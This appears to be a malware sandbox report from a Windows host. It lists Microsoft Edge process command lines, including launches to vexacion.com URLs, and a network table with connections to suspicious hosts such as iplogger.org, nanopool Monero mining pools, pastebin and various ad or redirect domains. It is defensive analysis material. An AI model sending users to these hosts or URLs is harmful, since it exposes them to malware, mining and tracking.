"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1648 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4500 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e3b846f8,0x7ff8e3b84708,0x7ff8e3b84718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1732 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=113 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=115 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e3b846f8,0x7ff8e3b84708,0x7ff8e3b84718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=116 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17645972830667222883,14141988703916376959,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1788 /prefetch:1

Network

Country Destination Domain Proto
FR 2.18.105.186:80 go.microsoft.com tcp
US 52.188.50.245:80 dmd.metaservices.microsoft.com tcp
US 40.125.122.176:443 slscr.update.microsoft.com tcp
US 52.152.108.96:443 fe3cr.delivery.mp.microsoft.com tcp
US 104.21.87.76:80 hsiens.xyz tcp
US 144.202.76.47:443 www.listincode.com tcp
US 40.125.122.176:443 slscr.update.microsoft.com tcp
US 162.0.213.132:80 safialinks.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 dns.google udp
US 208.95.112.1:80 ip-api.com tcp
US 104.21.79.144:443 a.goatgame.co tcp
US 40.125.122.176:443 slscr.update.microsoft.com tcp
US 45.136.151.102:80 staticimg.youtuuee.com tcp
US 72.21.91.29:80 statuse.digitalcertvalidation.com tcp
US 104.21.37.182:443 startupmart.bar tcp
DE 88.99.66.31:443 iplogger.org tcp
DE 88.99.66.31:443 iplogger.org tcp
DE 88.99.66.31:443 iplogger.org tcp
US 172.67.136.53:443 wheelllc.bar tcp
US 104.21.20.198:443 qwertys.info tcp
US 104.21.37.182:443 startupmart.bar tcp
US 104.21.17.186:443 yelty.info tcp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:49745 tcp
N/A 127.0.0.1:49748 tcp
US 45.136.151.102:80 staticimg.youtuuee.com tcp
US 104.21.13.27:80 liveme31.com tcp
US 172.67.131.66:443 phonefix.bar tcp
DE 88.99.66.31:443 iplogger.org tcp
US 172.67.159.99:443 real-web-online.bar tcp
US 104.21.70.98:443 live.goatgame.live tcp
DE 88.99.66.31:443 iplogger.org tcp
SC 185.215.113.104:18754 tcp
US 172.67.131.66:443 phonefix.bar tcp
US 162.0.210.44:443 connectini.net tcp
SC 185.215.113.104:18754 tcp
US 162.0.213.132:80 safialinks.com tcp
US 104.26.13.31:443 api.ip.sb tcp
US 162.0.220.187:80 requestimmersive.com tcp
US 104.26.13.31:443 api.ip.sb tcp
US 162.0.210.44:443 connectini.net tcp
NL 142.250.179.132:80 www.google.com tcp
US 162.0.210.44:443 connectini.net tcp
US 162.0.220.187:80 requestimmersive.com tcp
US 162.0.210.44:443 connectini.net tcp
UA 194.145.227.159:80 194.145.227.159 tcp
US 172.67.148.61:443 source3.boys4dayz.com tcp
US 104.21.62.66:443 aa.goatgamea.com tcp
US 104.21.30.211:443 bb.goatgamed.com tcp
DE 88.99.66.31:443 iplogger.org tcp
US 204.79.197.200:443 www.bing.com tcp
BG 111.90.156.46:80 fsstoragecloudservice.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
IE 52.178.182.73:443 nav.smartscreen.microsoft.com tcp
IE 52.178.182.73:443 nav.smartscreen.microsoft.com tcp
NL 23.97.153.169:443 nav.smartscreen.microsoft.com tcp
US 3.209.145.5:443 venetrigni.com tcp
US 104.21.79.144:443 a.goatgame.co tcp
IE 52.178.182.73:443 nav.smartscreen.microsoft.com tcp
NL 213.227.135.229:443 wildbearads.g2afse.com tcp
IE 52.178.182.73:443 nav.smartscreen.microsoft.com tcp
NL 139.45.197.239:443 bainushe.com tcp
DE 116.202.159.170:443 4568676.catchtheclick.com tcp
IE 52.178.182.73:443 nav.smartscreen.microsoft.com tcp
IE 52.178.182.73:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google udp
US 172.67.178.235:443 tcp
US 172.67.178.235:443 tcp
NL 23.97.153.169:443 nav.smartscreen.microsoft.com tcp
N/A 224.0.0.251:5353 udp
US 172.67.178.235:443 udp
US 69.16.175.42:443 tcp
US 142.251.36.14:443 tcp
US 104.16.18.94:443 tcp
US 104.16.18.94:443 udp
DE 46.4.25.9:443 tcp
NL 142.250.179.138:443 tcp
NL 142.250.179.138:443 tcp
DE 94.130.33.169:443 tcp
NL 142.250.179.138:443 udp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
NL 23.73.0.144:443 tcp
US 204.79.197.203:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
FR 2.22.22.217:443 tcp
NL 65.9.83.14:443 tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 8.8.8.8:443 dns.google udp
US 204.79.197.219:443 tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
SE 185.65.135.234:58899 sanctam.net tcp
IE 20.82.210.154:443 tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 104.192.141.1:443 bitbucket.org tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
NL 51.15.67.17:14433 xmr-eu2.nanopool.org tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 104.23.99.190:443 pastebin.com tcp
NL 51.15.69.136:14433 xmr-eu1.nanopool.org tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
NL 23.73.0.144:443 tcp
US 204.79.197.219:443 tcp
US 8.8.4.4:443 dns.google udp
NL 23.73.0.135:443 tcp
FR 2.22.22.145:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
N/A 127.0.0.1:5985 tcp
US 8.8.4.4:443 dns.google udp
US 131.253.33.219:443 tcp
US 162.0.220.187:80 requestimmersive.com tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google udp
US 204.79.197.219:443 tcp
US 8.8.4.4:443 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 3.229.58.197:443 tcp
NL 23.97.153.169:443 nav.smartscreen.microsoft.com tcp
US 172.67.26.25:443 tcp
US 104.26.6.228:443 tcp
US 104.26.7.228:443 tcp
US 3.229.58.197:443 tcp
FR 2.22.22.145:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 131.253.33.219:443 tcp
US 8.8.4.4:443 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 131.253.33.203:443 tcp
US 131.253.33.203:443 tcp
FR 2.22.22.171:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
NL 65.9.83.78:443 tcp
IE 52.142.114.2:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 20.82.209.183:443 tcp
FR 2.22.22.219:443 tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 131.253.33.203:443 tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
FR 2.22.22.171:443 tcp
NL 65.9.83.78:443 tcp
US 204.79.197.200:443 www.bing.com tcp
US 8.8.4.4:443 dns.google udp
US 8.8.4.4:443 dns.google tcp
FR 2.22.22.179:443 tcp
US 131.253.33.203:443 tcp
US 131.253.33.203:443 tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 131.253.33.200:443 tcp
FR 2.22.22.210:443 tcp
NL 65.9.83.14:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
US 204.79.197.203:443 tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
FR 2.22.22.210:443 tcp
NL 65.9.83.14:443 tcp
US 131.253.33.200:443 tcp
US 204.79.197.203:443 tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
FR 2.22.22.210:443 tcp
NL 65.9.83.14:443 tcp
US 131.253.33.200:443 tcp
FR 2.22.22.145:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 131.253.33.219:443 tcp
US 204.79.197.203:443 tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
NL 65.9.83.14:443 tcp
FR 2.22.22.210:443 tcp
US 131.253.33.200:443 tcp
US 204.79.197.203:443 tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
FR 2.22.22.210:443 tcp
US 131.253.33.200:443 tcp
NL 65.9.83.14:443 tcp
US 204.79.197.203:443 tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
FR 2.22.22.210:443 tcp
NL 65.9.83.14:443 tcp
US 131.253.33.200:443 tcp
FR 2.22.22.179:443 tcp
US 204.79.197.203:443 tcp
US 131.253.33.203:443 tcp
US 8.8.8.8:443 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 204.79.197.200:443 www.bing.com tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
NL 65.9.83.76:443 tcp
IE 52.142.114.2:443 tcp
FR 2.22.22.210:443 tcp
US 204.79.197.203:443 tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
FR 2.22.22.210:443 tcp
NL 65.9.83.76:443 tcp
US 204.79.197.200:443 www.bing.com tcp
US 204.79.197.203:443 tcp
US 204.79.197.203:443 tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
FR 2.22.22.210:443 tcp
NL 65.9.83.76:443 tcp
US 204.79.197.200:443 www.bing.com tcp
US 204.79.197.203:443 tcp
US 204.79.197.203:443 tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
FR 2.22.22.210:443 tcp
NL 65.9.83.76:443 tcp
US 204.79.197.200:443 www.bing.com tcp
US 204.79.197.203:443 tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
US 204.79.197.200:443 www.bing.com tcp
NL 65.9.83.76:443 tcp
FR 2.22.22.210:443 tcp
US 204.79.197.203:443 tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
FR 2.22.22.210:443 tcp
NL 65.9.83.76:443 tcp
US 204.79.197.200:443 www.bing.com tcp
US 8.8.8.8:443 dns.google udp
FR 2.22.22.136:443 tcp
US 204.79.197.203:443 tcp
US 131.253.33.203:443 tcp
US 204.79.197.200:443 www.bing.com tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
FR 2.22.22.219:443 tcp
NL 65.9.83.24:443 tcp
IE 52.142.114.2:443 tcp
US 204.79.197.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
FR 2.22.22.219:443 tcp
US 204.79.197.203:443 tcp
NL 65.9.83.24:443 tcp
US 204.79.197.200:443 www.bing.com tcp
FR 2.22.22.145:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:443 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 131.253.33.219:443 tcp
US 204.79.197.203:443 tcp
US 204.79.197.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
FR 2.22.22.219:443 tcp
NL 65.9.83.24:443 tcp
US 204.79.197.200:443 www.bing.com tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 tcp
NL 51.144.113.175:443 nav.smartscreen.microsoft.com tcp
NL 139.45.197.240:443 tcp
NL 139.45.195.8:443 tcp
NL 139.45.195.8:80 tcp
NL 139.45.197.240:80 tcp
US 104.248.185.101:443 tcp
NL 51.144.113.175:443 nav.smartscreen.microsoft.com tcp
NL 104.126.126.228:443 tcp
NL 104.126.126.228:443 tcp
IE 54.194.53.150:443 tcp
NL 65.9.83.86:443 tcp
NL 104.80.224.132:443 tcp
US 204.79.197.203:443 tcp
US 35.160.158.189:443 tcp
NL 95.101.58.226:443 tcp
NL 104.109.143.154:443 tcp
NL 23.209.125.83:443 ctldl.windowsupdate.com tcp
NL 23.209.125.81:443 tcp
NL 104.109.143.146:443 tcp
NL 104.80.228.241:443 tcp
DE 23.45.239.236:443 tcp
DE 23.45.239.236:443 tcp
NL 151.101.36.157:443 tcp
US 54.160.67.78:443 tcp
US 54.161.40.243:443 tcp
FR 15.236.176.210:443 tcp
US 104.244.42.67:443 tcp
US 104.244.42.133:443 tcp
US 54.161.40.243:443 tcp
US 54.161.40.243:443 tcp
NL 65.9.84.147:443 tcp
US 204.79.197.219:443 tcp
US 45.136.151.102:80 staticimg.youtuuee.com tcp
US 45.136.151.102:80 staticimg.youtuuee.com tcp
FR 2.22.22.145:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 131.253.33.219:443 tcp
FR 2.22.22.145:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:443 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 204.79.197.219:443 tcp
US 8.8.8.8:443 dns.google udp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 tcp
NL 139.45.197.240:443 tcp
NL 139.45.195.8:443 tcp
NL 139.45.195.8:80 tcp
NL 139.45.197.240:80 tcp
US 104.248.185.101:443 tcp
NL 104.126.126.228:443 tcp
IE 52.48.145.41:443 tcp
US 54.244.27.30:443 tcp
NL 95.101.58.226:443 tcp
NL 104.80.224.132:443 tcp
NL 151.101.36.157:443 tcp
IE 52.48.145.41:443 tcp
US 104.244.42.131:443 tcp
US 104.244.42.133:443 tcp
US 54.158.67.235:443 tcp
US 52.200.158.249:443 tcp
FR 13.36.218.177:443 tcp
US 8.8.8.8:443 dns.google udp
US 8.8.8.8:443 dns.google tcp
NL 95.101.58.226:443 tcp
US 8.8.8.8:443 dns.google udp
US 35.201.70.46:80 www.directdexchange.com tcp
US 35.201.70.46:80 tcp
IE 52.178.182.73:443 nav.smartscreen.microsoft.com tcp
IE 52.178.182.73:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:443 dns.google udp
US 8.8.8.8:443 dns.google tcp
NL 95.101.58.226:443 tcp
US 45.136.151.102:80 staticimg.youtuuee.com tcp
US 45.136.151.102:80 staticimg.youtuuee.com tcp
US 35.201.70.46:443 tcp
US 35.201.70.46:443 tcp
US 8.8.4.4:443 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 131.253.33.203:443 tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
FR 2.22.22.217:443 tcp
IE 52.142.114.2:443 tcp
NL 65.9.83.76:443 tcp
US 204.79.197.200:443 www.bing.com tcp
US 131.253.33.203:443 tcp
US 131.253.33.203:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
US 204.79.197.200:443 www.bing.com tcp
IE 52.142.114.2:443 tcp
FR 2.22.22.217:443 tcp
